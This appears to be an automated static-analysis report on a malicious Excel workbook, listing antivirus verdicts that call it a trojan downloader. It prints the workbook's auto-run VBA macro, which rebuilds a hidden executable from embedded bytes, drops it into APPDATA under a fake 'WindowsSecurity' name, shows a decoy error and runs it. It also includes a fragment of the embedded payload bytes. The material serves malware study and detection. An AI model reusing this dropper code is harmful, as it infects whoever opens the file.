Static | ZeroBOX

Original


                                        Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
 Sub Workbook_Open()

hola
End Sub

 Sub unzipper(zFname As Variant, eFname As Variant)
    Dim FSO As Object
    
    Dim oApp As Object
     
    Set oApp = CreateObject("Shell.Application")
    
    oApp.Namespace(eFname).CopyHere oApp.Namespace(zFname).items
    
   
End Sub


Sub hola()

Dim path_file As String

Dim file_name As String

Dim folder_name As Variant

Dim byt() As Byte

Dim ar1Gohra() As String


file_name = "WindowsSecurity"

folder_name = Environ$("APPDATA") & "\"

If Dir(folder_name, vbDirectory) = "" Then
MkDir (folder_name)
End If


path_file = folder_name & file_name

Dim linGohra As Double

linGohra = 0
Dim liar As Integer

liar = 0

Dim btsGohra7(361128) As Byte
ar1Gohra = Split(UserForm1.TextBox1.Text, "-")

For Each vl In ar1Gohra
btsGohra7(linGohra) = CByte(vl)
linGohra = linGohra + 1
Next


Open path_file & ".zip" For Binary Access Write As #3
Put #3, , btsGohra7
Close #3




If Dir(folder_name & file_name & ".e" & "xe") = "" Then
unzipper folder_name & file_name & ".zip", folder_name
End If

 Dim a As String
a = MsgBox("Microsoft Office Excel: This Version isn't Compatible with This file.", vbCritical, "Microsoft Error")


Shell folder_name & file_name & ".e" & "xe", vbNormalNoFocus


End Sub

                                    

Deobfuscated


                                        Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
 Sub Workbook_Open()

hola
End Sub

 Sub unzipper(zFname As Variant, eFname As Variant)
    Dim FSO As Object
    
    Dim oApp As Object
     
    Set oApp = CreateObject("Shell.Application")
    
    oApp.Namespace(eFname).CopyHere oApp.Namespace(zFname).items
    
   
End Sub


Sub hola()

Dim path_file As String

Dim file_name As String

Dim folder_name As Variant

Dim byt() As Byte

Dim ar1Gohra() As String


file_name = "WindowsSecurity"

folder_name = Environ$("APPDATA") & "\"

If Dir(folder_name, vbDirectory) = "" Then
MkDir (folder_name)
End If


path_file = folder_name & file_name

Dim linGohra As Double

linGohra = 0
Dim liar As Integer

liar = 0

Dim btsGohra7(361128) As Byte
ar1Gohra = Split(UserForm1.TextBox1.Text, "-")

For Each vl In ar1Gohra
btsGohra7(linGohra) = CByte(vl)
linGohra = linGohra + 1
Next


Open path_file & ".zip" For Binary Access Write As #3
Put #3, , btsGohra7
Close #3




If Dir(folder_name & file_name & ".exe") = "" Then
unzipper folder_name & file_name & ".zip", folder_name
End If

 Dim a As String
a = MsgBox("Microsoft Office Excel: This Version isn't Compatible with This file.", vbCritical, "Microsoft Error")


Shell folder_name & file_name & ".exe", vbNormalNoFocus


End Sub

                                    

Original


                                        Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                    

Deobfuscated


                                        Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                    

Original


                                        Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                    

Deobfuscated


                                        Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                    

Original


                                        Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                    

Deobfuscated


                                        Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                    

Original


                                        Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{1431F97C-471B-4F10-9B03-8ECA78809132}{33DA1254-85A2-467D-A205-17541BE63550}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub TextBox1_Change()

End Sub

                                    

Deobfuscated


                                        Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{1431F97C-471B-4F10-9B03-8ECA78809132}{33DA1254-85A2-467D-A205-17541BE63550}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub TextBox1_Change()

End Sub

                                    
KB976932
C:\Users\Testing\Desktop\KB976932
C:\Users\Testing\AppData\Local\Temp\KB976932
!This program cannot be run in DOS mode.
RichvS
`.rdata
@.data
.reloc
wmWritten
_bbRuuqbbJ
dwDownloaded
dwSize
_f1g5h98
PRSVWj
YY_^[ZX
HHtXHHt
?If90t
j@j ^V
<at,<rt"<wt
URPQQh Z
t"SS9] u
PPPPPPPP
PPPPPPPP
f99u#f
tCHt(Ht
;t$,v-
UQPXY]Y[
^SSSSS
y{vvuxzykyyout4ro|k
%s%s%s
HOMEDRIVE
HOMEPATH
bbRuuqbbJxo|kbb}sobbnuyzius4k~k
bad allocation
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
FlsFree
FlsSetValue
FlsGetValue
FlsAlloc
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
(null)
`h````
xpxxxx
Unknown Runtime Check Error
Stack memory around _alloca was corrupted
A local variable was used before it was initialized
Stack memory was corrupted
A cast to a smaller data type has caused a loss of data. If this was intentional, you should mask the source of the cast with the appropriate bitmask. For example:
char c = (i & 0xFF);
Changing the code in this way will not affect the quality of the resulting optimized code.
The value of ESP was not properly saved across a function call. This is usually a result of calling a function declared with one calling convention with a function pointer declared with a different calling convention.
Stack around the variable '
' was corrupted.
The variable '
' is being used without being initialized.
Run-Time Check Failure #%d - %s
Unknown Module Name
Unknown Filename
Stack corrupted near unknown variable
Stack around _alloca corrupted
Local variable used before initialization
Stack memory corruption
Cast to smaller type causing loss of data
Stack pointer corruption
UTF-16LE
UNICODE
CorExitProcess
Unknown exception
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
`h`hhh
xppwpp
RegCloseKey
RegQueryValueExW
RegOpenKeyExW
PDBOpenValidate5
GetProcessWindowStation
GetUserObjectInformationW
GetLastActivePopup
GetActiveWindow
MessageBoxW
Complete Object Locator'
Class Hierarchy Descriptor'
Base Class Array'
Base Class Descriptor at (
Type Descriptor'
`local static thread guard'
`managed vector copy constructor iterator'
`vector vbase copy constructor iterator'
`vector copy constructor iterator'
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector vbase copy constructor iterator'
`eh vector copy constructor iterator'
`managed vector destructor iterator'
`managed vector constructor iterator'
`placement delete[] closure'
`placement delete closure'
`omni callsig'
delete[]
new[]
`local vftable constructor closure'
`local vftable'
`udt returning'
`copy constructor closure'
`eh vector vbase constructor iterator'
`eh vector destructor iterator'
`eh vector constructor iterator'
`virtual displacement map'
`vector vbase constructor iterator'
`vector destructor iterator'
`vector constructor iterator'
`scalar deleting destructor'
`default constructor closure'
`vector deleting destructor'
`vbase destructor'
`string'
`local static guard'
`typeof'
`vcall'
`vbtable'
`vftable'
operator
delete
__unaligned
__restrict
__ptr64
__eabi
__clrcall
__fastcall
__thiscall
__stdcall
__pascal
__cdecl
__based(
CloseHandle
WriteFile
GetLastError
CreateFileA
KERNEL32.dll
WinHttpCloseHandle
WinHttpReadData
WinHttpQueryDataAvailable
WinHttpReceiveResponse
WinHttpSendRequest
WinHttpOpenRequest
WinHttpConnect
WinHttpOpen
WINHTTP.dll
MultiByteToWideChar
GetCurrentThreadId
DecodePointer
GetCommandLineA
IsProcessorFeaturePresent
GetCPInfo
InterlockedIncrement
InterlockedDecrement
GetACP
GetOEMCP
IsValidCodePage
EncodePointer
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
GetModuleHandleW
SetLastError
GetProcAddress
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsDebuggerPresent
TerminateProcess
GetCurrentProcess
EnterCriticalSection
LeaveCriticalSection
RaiseException
WideCharToMultiByte
LoadLibraryW
SetHandleCount
GetStdHandle
InitializeCriticalSectionAndSpinCount
GetFileType
GetStartupInfoW
DeleteCriticalSection
SetFilePointer
RtlUnwind
ExitProcess
HeapFree
GetModuleFileNameA
FreeEnvironmentStringsW
GetEnvironmentStringsW
HeapCreate
HeapDestroy
QueryPerformanceCounter
GetTickCount
GetCurrentProcessId
GetSystemTimeAsFileTime
HeapAlloc
LCMapStringW
GetStringTypeW
FreeLibrary
GetProcessHeap
GetModuleFileNameW
VirtualQuery
SetStdHandle
GetConsoleCP
GetConsoleMode
FlushFileBuffers
CompareStringW
SetEnvironmentVariableA
HeapReAlloc
HeapSize
WriteConsoleW
SetEndOfFile
ReadFile
CreateFileW
downloaderwinhttp.dll
calldll
.?AVbad_alloc@std@@
.?AVexception@std@@
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AVtype_info@@
0>0J0V0a0m0
1D1i1n1{1
1'2:2G2
5-5C5Q5_5d5q5v5
6$6o7J9Y9m9
:D;L;a;l;.<G<
=c>n>z>
545L5T5]5
657H7w7
;H;U;_;m;v;
?#?,?2?;?@?O?v?
3#3,323;3G3M3U3[3g3m3z3
31474a4g4m4
4;5^5h5
6,62686G6U6_6e6{6
7(7.767;7C7H7P7U7\7k7p7v7
9&939q9x9
:G:M:g:v:
;';1;W;
;7<I<~=
22"3m4
;!;';-;3;9;@;G;N;U;\;c;j;r;z;
<%=X=z=
= >C>x>
050[0a0
031=1h1
222U2[2p2
728Z8|8
9,9>9C9
?5?@?H?X?^?o?
1$1;1I1O1r1y1
3!3-3d3m3y3
414@4x4
6J7P7l7
8!8&8N8Z8c8i8o8
:*:2:::F:o:w:
;N<S<\<k<
=@=F=U=
5$565H5Z5
6"646F6X6j6z7
8/8M8T8X8\8`8d8h8l8p8
829=9X9_9d9h9l9
:V:\:`:d:h:
<!<&<4<~<
H0S0d0i0o0
2j2r2~2
4P4c4t4
5)646b6p6y6
7,797a7
78~8!9A91:Z:
0-0c0m0]2
2H3[3z3
<U=o=x=
4H4T4c4o4
6"60656:6?6O6~6
7#7*7/7=7
758D8W8j8|8
9P9]9r9
;';^;v;c<
=(=3=9=I=N=_=g=m=w=}=
?0F0L0
T1X1\1`1l1p1
2t7x7 :$:(:,:0:4:
0$0,040<0D0L0T0\0d0l0P7T7X7\7`7d7h7l7p7t7x7|7
8 8$8(8,8084888<8@8D8H8L8P8T8X8\8`8d8h8l8p8t8x8|8
8$9(9<9@9P9T9X9`9x9|9
: :,:P:p:
; ;(;,;4;H;P;d;
<,<0<L<P<p<
=8=T=X=x=
> ><>@>`>
040x4x5|5
6 6064686<6@6D6H6L6P6T6X6\6`6d6h6l6p6t6x6|6
687H7X7h7x7
7@9H9P9
;P=p=t=x=|=
ITministrator B
ThisWorkbook
_ * #,##0_ ;_ * \-#,##0_ ;_ * "-"_ ;_ @_
_ * #,##0.00_ ;_ * \-#,##0.00_ ;_ * "-"??_ ;_ @_
"$"#,##0_);\("$"#,##0\)
"$"#,##0_);[Red]\("$"#,##0\)
"$"#,##0.00_);\("$"#,##0.00\)
"$"#,##0.00_);[Red]\("$"#,##0.00\)
_("$"* #,##0_);_("$"* \(#,##0\);_("$"* "-"_);_(@_)
_(* #,##0_);_(* \(#,##0\);_(* "-"_);_(@_)
_("$"* #,##0.00_);_("$"* \(#,##0.00\);_("$"* "-"??_);_(@_)
_(* #,##0.00_);_(* \(#,##0.00\);_(* "-"??_);_(@_)
00\);_(*
00\);_(*
00\);_(*
00\);_(*
00\);_(*
00\);_(*
00\);_(*
00\);_(*
00\);_(*
00\);_(*
00\);_(*
00\);_(*
00\);_(*
00\);_(*
00\);_(*
00\);_(*
00\);_(*
;_(@_)\
00\);_(*
;_(@_)\
00\);_(*
;_(@_)\
00\);_(*
;_(@_)\
00\);_(*
;_(@_)\
00\);_(*
;_(@_)\
00\);_(*
;_(@_)\
00\);_(*
;_(@_)\
00\);_(*
;_(@_)\
00\);_(*
;_(@_)\
00\);_(*
;_(@_)\
00\);_(*
;_(@_)\
00\);_(*
;_(@_)\
00\);_(*
;_(@_)\
00\);_(*
;_(@_)\
00\);_(*
;_(@_)\
00\);_(*
;_(@_)\
00\);_(*
;_(@_)\
00\);_(*
;_(@_)\
00\);_(*
;_(@_)\
00\);_(*
;_(@_)\
00\);_(*
;_(@_)\
00\);_(*
;_(@_)\
00\);_(*
;_(@_)\
00\);_(*
;_(@_)\
00\);_(*
;_(@_)\
00\);_(*
;_(@_)\
00\);_(*
00\);_(*
00\);_(*
00\);_(*
00\);_(*
00\);_(*
;_(@_)\
00\);_(*
;_(@_)\
00\);_(*
;_(@_)\
00\);_(*
;_(@_)\
00\);_(*
00\);_(*
;_(@_)\
00\);_(*
;_(@_)\
00\);_(*
;_(@_)\
00\);_(*
;_(@_)\
00\);_(*
;_(@_)\
00\);_(*
00\);_(*
00\);_(*
;_(@_)\
00\);_(*
00\);_(*
;_(@_)\
20% - Accent1
20% - Accent2
20% - Accent3
20% - Accent4
20% - Accent5
20% - Accent6
40% - Accent1
40% - Accent2
40% - Accent3
40% - Accent4
40% - Accent5
40% - Accent6
60% - Accent1
60% - Accent2
60% - Accent3
60% - Accent4
60% - Accent5
60% - Accent6
Accent1
Accent2
Accent3
Accent4
Accent5
Accent6
Calculation
Check Cell
Explanatory Text
Heading 1
Heading 2
Heading 3
Heading 4
Linked Cell
Neutral
Output
Warning Text
Sheet1
Sheet2
Sheet3
JLee`Pp
ARBHl1(
_)k:~yw
ffffff
ffffff
InputBin
FORMSOURCE
RESDLL
UniresDLL
PaperSize
LETTER
Orientation
PORTRAIT
ColorMode
Resolution
Res300
333333
?333333
Package2
Sheet1g
ffffff
ffffff
333333
?333333
Sheet2g
ffffff
ffffff
333333
?333333
Sheet3g
Office Excel: This Version isn't Compatible with This file.
Microsoft Error
Attribut
e VB_Nam
e = "Thi
sWorkboo
0{00020P819-
$0046}
|Global
dCreat
ateDeriv
Bustomi
2 Sub
_Open()
unzipper
Variant,, e
Di@m FSO
("She
*.AesAe(
CopyHere
C3).ite
.path_,fi
ol8der
Windows
Security
iron$("A
PPDATA") & "\
If@ Dir(fG
" Then
B7A=Dou
= 0CAliar
Integer
7(361128
(UserFor
m1.TextB
vl In
a#C!6(
Binary A
ccess W`9
t #3, ,
xe @@G
:E|u6{B
#eC?`Hm, a
Ta@.Ms
g ,("Micr
osoft Of
isn't C
Erro~r
Shell.Application
WindowsSecurity
APPDATA
Microsoft
Attribut
e VB_Nam
e = "She@et1"
t0{000
20820-
|Global!
Pre decla
lateDeri
Bustom
Attribut
e VB_Nam
e = "She@et2"
t0{000
20820-
|Global!
Pre decla
lateDeri
Bustom
Attribut
e VB_Nam
e = "She@et3"
t0{000
20820-
|Global!
Pre decla
lateDeri
Bustom
Attribut
e VB_Nam
e = "Use
rForm1"
1431F97C
-471B-4F
10-9B03-
8ECA7880
9132}{33
DA1254-8
5A2-467D
-A205-17
541BE635
o False
Cr@eatabl
redecla
BE`xpose
emplateD
Sub Te
xtBox1_C
hange()
Win64x
VBAProject
stdole
Office
MSFormsC
ThisWorkbook|
_Evaluate
Workbook_Open
unzipper
zFname
eFnameP
CreateObject
Namespace
CopyHere
items`h
path_file
file_name
folder_name
ar1Gohra!
Environ
vbDirectoryg
linGohra
btsGohra7N
UserForm1)
TextBox1
MsgBox
vbCritical+}
ShellV
vbNormalNoFocus
Sheet1
Sheet2
Sheet3
TextBox1_Change=
Workbookk
_B_str_Environ
UserFormN
Change
_B_var_vl7
VBAProje
stdole>
*\G{00
020430-
6}#2.0#0
#C:\Wind
ows\Syst em32\
tlb#OLE
Automati
EOffDic
2DF8D04C
5BFA-10
1B-BDE5
gram Fil
es\Commo
Micros
oft Shar
ed\OFFIC
E15\MSO.0DLL#
M 1@5.0 Ob
Library
D452EE1-
-02608C@4D0BB4
SFM20L'B
Hq00}t#0Bq#
C2FD75-
B5-B44
1-FB0635
rs\ADMIN
I~1\AppD
ata\Loca
l\Temp\V
ThisWork
rSheetT1G
VBAProject
ThisWorkbook
Sheet1
Sheet2
Sheet3
UserForm1
C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA7.1\VBE7.DLL
C:\Program Files\Microsoft Office\Office15\EXCEL.EXE
C:\Windows\System32\stdole2.tlb
stdole
C:\Program Files\Common Files\Microsoft Shared\OFFICE15\MSO.DLL
Office
C:\Windows\system32\FM20.DLL
MSForms
C:\Users\ADMINI~1\AppData\Local\Temp\VBE\MSForms.exd
Workbook
Workbook_Open
unzipper
VBE7.D
TextBox1
UserForm
F3Dynamic
TextBox1_Change
zFname
eFname
TextBox1
Microsoft Forms 2.0 Form
Embedded Object
80-75-3-4-20-0-0-0-8-0-71-102-191-82-199-14-215-100-33-130-5-0-3-78-10-0-19-0-0-0-87-105-110-100-111-119-115-83-101-99-117-114-105-116-121-46-101-120-101-236-189-11-124-84-213-181-56-124-230-145-201-72-6-206-0-131-68-141-16-37-40-54-136-145-160-6-6-106-94-39-137-154-129-25-66-38-40-4-236-173-198-24-173-34-204-240-80-194-235-100-52-39-155-211-210-123-165-213-86-175-216-98-47-109-105-75-111-1-83-11-154-7-205-4-68-8-152-98-20-106-163-141-237-198-164-53-2-13-1-34-231-91-107-239-51-175-188-192-251-191-223-247-253-126-223-239-139-50-231-156-253-88-123-237-181-214-94-107-237-181-247-217-199-245-208-22-193-36-8-130-25-254-105-154-32-212-10-252-47-83-184-242-159-213-32-8-163-38-190-53-74-216-125-205-123-55-213-26-10-223-187-105-65-249-227-43-146-151-45-127-250-177-229-223-250-78-242-183-191-245-212-83-79-251-146-255-237-209-228-229-254-167-146-31-127-42-57-119-94-81-242-119-158-126-228-209-105-35-71-142-72-209-97-140-157-149-190-161-100-81-233-251-161-127-57-105-75-142-231-178-235-194-227-255-201-174-15-30-207-130-235
Tahoma
VERSION 5.00
Begin {C62A69F0-16DC-11CE-9E98-00AA00574A4F} UserForm1
Caption = "UserForm1"
ClientHeight = 12015
ClientLeft = 45
ClientTop = 390
ClientWidth = 16290
StartUpPosition = 1 'CenterOwner
TypeInfoVer = 1
ThisWorkbook
Sheet1
Sheet2
Sheet3
UserForm1
ID="{00000000-0000-0000-0000-000000000000}"
Document=ThisWorkbook/&H00000000
Document=Sheet1/&H00000000
Document=Sheet2/&H00000000
Document=Sheet3/&H00000000
Package={AC9F2F90-E877-11CE-9F68-00AA00574A4F}
BaseClass=UserForm1
HelpFile=""
Name="VBAProject"
HelpContextID="0"
VersionCompatible32="393222000"
CMG="C9CB6573697369776D776D"
DPB="1614BA8D4A978AB48AB4754C8BB46F8C915A11FCA4DCF1069F206CEEDB45E4CD19FE41D118053B"
GC="6361CF401D411D411D"
[Host Extender Info]
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
[Workspace]
ThisWorkbook=52, 52, 1691, 783,
Sheet1=0, 0, 0, 0, C
Sheet2=0, 0, 0, 0, C
Sheet3=0, 0, 0, 0, C
UserForm1=104, 104, 1743, 835, , 26, 26, 2016, 808, Z
Testing
Administrator
Microsoft Excel
Sheet1
Sheet2
Sheet3
Worksheets
Microsoft Excel 2003 Worksheet
Excel.Sheet.8
Root Entry
Workbook
_VBA_PROJECT_CUR
MBD010F1B0C
Ole10Native
ThisWorkbook
__SRP_2
jjjjjj
/192362/x2d34x3
orrg5;46.VrgzkluxsDAx|@mkiqu|kxyoutMkiqu5mkiquzxgor5Loxklu~5loxklu~|kxyoutyrr
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
nKERNEL32.DLL
(null)
Run-Time Check Failure #%d - %s
Runtime Check Error.
Unable to display RTC Message.
mscoree.dll
((((( H
h(((( H
H
MSPDB100.DLL
EnvironmentDirectory
SOFTWARE\Microsoft\VisualStudio\10.0\Setup\VS
ADVAPI32.DLL
runtime error
TLOSS error
SING error
DOMAIN error
- Attempt to use MSIL code from this assembly during native code initialization
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
- not enough space for locale information
- Attempt to initialize the CRT more than once.
This indicates a bug in your application.
- CRT not initialized
- unable to initialize heap
- not enough space for lowio initialization
- not enough space for stdio initialization
- pure virtual function call
- not enough space for _onexit/atexit table
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
- not enough space for thread data
- abort() has been called
- not enough space for environment
- not enough space for arguments
- floating point support not loaded
Microsoft Visual C++ Runtime Library
<program name unknown>
Runtime Error!
Program:
WUSER32.DLL
CONOUT$
C:\Users\Testing\AppData\Local\Temp\KB976932
KB976932!
C:\Users\Testing\Desktop\KB976932
Calibri1
Calibri1
Calibri1
Calibri1
Calibri1
Calibri1
Calibri1
Calibri1
Calibri1
Calibri1
Calibri1
Calibri1
Calibri1
Calibri1
Calibri1
Calibri1
Calibri1
Calibri1
Cambria1
Calibri1
Calibri
"\ #,##0;"
"\ \-#,##0
"\ #,##0;[Red]"
"\ \-#,##0
"\ #,##0.00;"
"\ \-#,##0.00
"\ #,##0.00;[Red]"
"\ \-#,##0.00
"\ * #,##0_ ;_ "
"\ * \-#,##0_ ;_ "
"\ * "-"_ ;_ @_
"\ * #,##0.00_ ;_ "
"\ * \-#,##0.00_ ;_ "
"\ * "-"??_ ;_ @_
20% - Accent1
20% - Accent2
20% - Accent3
20% - Accent4
20% - Accent5
20% - Accent6
40% - Accent1
40% - Accent2
40% - Accent3
40% - Accent4
40% - Accent5
40% - Accent6
60% - Accent1
60% - Accent2
60% - Accent3
60% - Accent4
60% - Accent5
60% - Accent6
Accent1
Accent2
Accent3
Accent4
Accent5
Accent6
Calculation
Check Cell
Comma [0]
Currency
Currency [0]
Explanatory Text
Heading 1
Heading 2
Heading 3
Heading 4
Linked Cell
Neutral
Normal
Output
Percent
Warning Text
TableStyleMedium9PivotStyleLight16
OneNote for Windows 10
Letter
{133619e4-143b-463a-b809-b1f51d05f973}
N0{00020819-0000-0000-C000-000000000046}
$*\Rffff*0662a9d6e8
*\R0*#17
*\R0*#3
*\R0*#12
$*\Rffff*0762a9d6ea
*\G{AC2DE821-36A2-11CF-8053-00AA006009FA}#2.0#0#..\..\..\Windows\system32\FM20.DLL\2#Microsoft Forms 2.0 Object Library*#44
*\R0*#f
*\R0*#1
*\R0*#8
__SRP_3
Sheet1
Sheet2
Sheet3
N0{00020820-0000-0000-C000-000000000046}
N0{00020820-0000-0000-C000-000000000046}
N0{00020820-0000-0000-C000-000000000046}
UserForm1
__SRP_4
__SRP_5
_VBA_PROJECT
0{1431F97C-471B-4F10-9B03-8ECA78809132}{33DA1254-85A2-467D-A205-17541BE63550}
$*\Rffff*0762a9d6ea
*\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA7.1\VBE7.DLL#Visual Basic For Applications
*\G{00020813-0000-0000-C000-000000000046}#1.8#0#C:\Program Files\Microsoft Office\Office15\EXCEL.EXE#Microsoft Excel 15.0 Object Library
*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\System32\stdole2.tlb#OLE Automation
*\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.7#0#C:\Program Files\Common Files\Microsoft Shared\OFFICE15\MSO.DLL#Microsoft Office 15.0 Object Library
*\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\Windows\system32\FM20.DLL#Microsoft Forms 2.0 Object Library
*\G{15C2FD75-430A-43B5-B441-FB063526430C}#2.0#0#C:\Users\ADMINI~1\AppData\Local\Temp\VBE\MSForms.exd#Microsoft Forms 2.0 Object Library
ThisWorkbook
0662a9d6e8
ThisWorkbook
Sheet1
0262a9d6e8
Sheet1
Sheet2
0362a9d6e8
Sheet2
Sheet3
0462a9d6e8
Sheet3
UserForm1
0762a9d6ea
UserForm1
__SRP_0
__SRP_1
UserForm1
WindowsSecurity
APPDATA
Microsoft Office Excel: This Version isn't Compatible with This file.
Microsoft Error
CompObj
VBFrame
kThisWorkbook
1Sheet1
2Sheet2
3Sheet3
1UserForm1
PROJECTwm
PROJECT
SummaryInformation
DocumentSummaryInformation
CompObj
Antivirus Signature
Bkav Clean
Elastic malicious (high confidence)
ClamAV Ole2.Macro.Agent-9858797-0
FireEye VBA.Heur.ObfDldr.22.BB49248F.Gen
CAT-QuickHeal Clean
McAfee Artemis!D140F63FF050
Malwarebytes Clean
VIPRE Trojan.Win32.Generic!BT
AegisLab Trojan.MSExcel.Generic.4!c
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Baidu Clean
Cyren W32/Trojan.DDCH-7600
Symantec Trojan.Gen.MBT
ESET-NOD32 Win32/TrojanDownloader.Agent.FCH
TrendMicro-HouseCall Trojan.Win32.DONOFF.C
Avast Win32:Trojan-gen
Cynet Malicious (score: 99)
Kaspersky HEUR:Trojan-Dropper.MSOffice.SDrop.gen
BitDefender VBA.Heur.ObfDldr.22.BB49248F.Gen
NANO-Antivirus Trojan.Ole2.Vbs-heuristic.druvzi
SUPERAntiSpyware Clean
MicroWorld-eScan VBA.Heur.ObfDldr.22.BB49248F.Gen
Ad-Aware VBA.Heur.ObfDldr.22.BB49248F.Gen
Sophos Clean
Comodo TrojWare.Win32.UMal.hoigz@0
F-Secure Clean
DrWeb Exploit.Siggen3.17878
Zillya Clean
TrendMicro Trojan.Win32.DONOFF.C
McAfee-GW-Edition BehavesLike.OLE2.Dropper.tx
CMC Clean
Emsisoft VBA.Heur.ObfDldr.22.BB49248F.Gen (B)
SentinelOne Clean
GData VBA.Heur.ObfDldr.22.BB49248F.Gen
Jiangmin Clean
Avira TR/Dldr.Agent.dsfuo
MAX malware (ai score=83)
Antiy-AVL Trojan/Generic.ASMalwS.3059AA2
Kingsoft Clean
Gridinsoft Clean
Arcabit HEUR.VBA.Trojan.d
ViRobot XLS.Z.Agent.1425408
ZoneAlarm HEUR:Trojan.Script.Generic
Microsoft TrojanDownloader:O97M/Obfuse.VAL!MTB
AhnLab-V3 Downloader/Win32.Agent.C4114357
Acronis Clean
BitDefenderTheta Gen:NN.ZedlaF.34738.eq4@aqXPYYj
ALYac Trojan.Downloader.XLS.gen
TACHYON Suspicious/W97.NS.Gen
VBA32 Clean
Zoner Clean
Rising Trojan.Generic@ML.80 (RDML:w2ILrCKxjQVkzrQNW4ZhGw)
Yandex Clean
Ikarus Trojan-Downloader.Win32.Agent
MaxSecure Clean
Fortinet WM/Agent.U!tr.dldr
AVG Win32:Trojan-gen
Panda Clean
Qihoo-360 Clean
No IRMA results available.